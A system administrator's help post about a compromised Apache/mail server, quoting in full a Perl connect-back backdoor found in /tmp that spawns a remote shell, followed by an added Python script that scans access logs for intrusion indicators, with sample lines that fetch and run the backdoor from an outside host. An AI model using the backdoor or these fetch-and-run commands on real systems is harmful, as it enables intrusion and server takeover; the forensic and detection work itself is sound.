I have a personal apache/mail server that is getting hacked and I'm not
sure how the person is getting in. What's happening is that every few
days, the below script will show up in /tmp as 'dc.txt', owned by apache,
and then a TON of mail is queued up to a bunch of addresses in
@uol.com.br.
I initially thought they got in because I had an outdated version of
'gallery' installed. I rebuilt the server and updated gallery and
thought I should be okay. But now they are still getting in and, instead
of blindly rebuilding the server, I need to figure out how they are able
to run perl scripts on the server.
Any suggestions?
--Ajay
PS. This is a CentOS 4.2 box running the latest apache/php RPMs.
---------------------------
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";
--------------------------------
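One way to answer the question the post asks (which web request is launching scripts as the apache user) is to correlate the mtime of /tmp/dc.txt with the Apache access_log and look for requests whose query string carries a remote URL, a downloader or interpreter name, a /tmp path, or a shell command separator. The script below is an added example written for this thread, not code from the original post or from any project it mentions. The log lines, client addresses and the /gallery/index.php path in it are constructed for illustration; run the same functions over the real access_log around the timestamp of the dropped file.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample of Apache combined-format access_log lines (not from the post).
# Three requests from one client carry the kinds of indicators that precede a
# script being dropped in /tmp; the last two are ordinary traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jan/2006:03:14:07 -0500] "GET /gallery/index.php?page=http://198.51.100.7/dc.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [12/Jan/2006:03:14:09 -0500] "GET /gallery/index.php?cmd=cd%20/tmp;wget%20http://198.51.100.7/dc.txt HTTP/1.1" 200 88 "-" "Mozilla/4.0"
203.0.113.5 - - [12/Jan/2006:03:14:12 -0500] "GET /gallery/index.php?cmd=perl%20/tmp/dc.txt%20198.51.100.7%204444 HTTP/1.1" 200 0 "-" "Mozilla/4.0"
192.0.2.10 - - [12/Jan/2006:08:02:51 -0500] "GET /gallery/index.php?page=about HTTP/1.1" 200 4096 "http://example.test/" "Mozilla/5.0"
192.0.2.11 - - [12/Jan/2006:08:03:14 -0500] "GET /images/logo.png HTTP/1.1" 200 2048 "http://example.test/" "Mozilla/5.0"
"""

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Indicators checked against the URL-decoded request URI. Each is a generic sign of
# a web application being driven to fetch or run something, not a signature of dc.txt.
INDICATORS = {
    "remote_include": re.compile(r'=\s*(?:https?|ftp)://', re.I),     # parameter set to a remote URL
    "shell_tool": re.compile(
        r'(?:^|[^a-z])(?:wget|curl|perl|bash|lwp-download)(?:$|[^a-z])', re.I),
    "tmp_path": re.compile(r'/(?:tmp|var/tmp|dev/shm)(?:/|\b)', re.I),  # world-writable dirs
    "command_sep": re.compile(r'[;|`]|\$\('),                         # shell metacharacters
}


def parse_line(line):
    """Parse one combined-format line; return a dict or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode %XX escapes so encoded spaces, semicolons and slashes are visible.
    rec["decoded_uri"] = unquote_plus(rec["uri"])
    return rec


def flag_request(decoded_uri):
    """Return the sorted names of all indicators that fire on a decoded URI."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(decoded_uri))


def scan(log_text):
    """Return a list of suspicious requests (ip, timestamp, raw URI, indicator names)."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        flags = flag_request(rec["decoded_uri"])
        if flags:
            hits.append({"ip": rec["ip"], "ts": rec["ts"], "uri": rec["uri"], "flags": flags})
    return hits


def entry_points(hits):
    """Count suspicious requests per script path (URI without the query string).

    The path with the most hits is the web application to audit or disable first.
    """
    return Counter(h["uri"].split("?", 1)[0] for h in hits)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["ip"]} {",".join(h["flags"])} {h["uri"]}')
    print("entry points:", dict(entry_points(found)))
```

On the real box, feed `scan()` the access_log (and any virtual-host logs) for the minutes before the mtime of /tmp/dc.txt; the script path that `entry_points()` reports is where the attacker's requests land, which is the question the post is trying to answer. Any request this flags that returned 200 deserves a look at the corresponding PHP source.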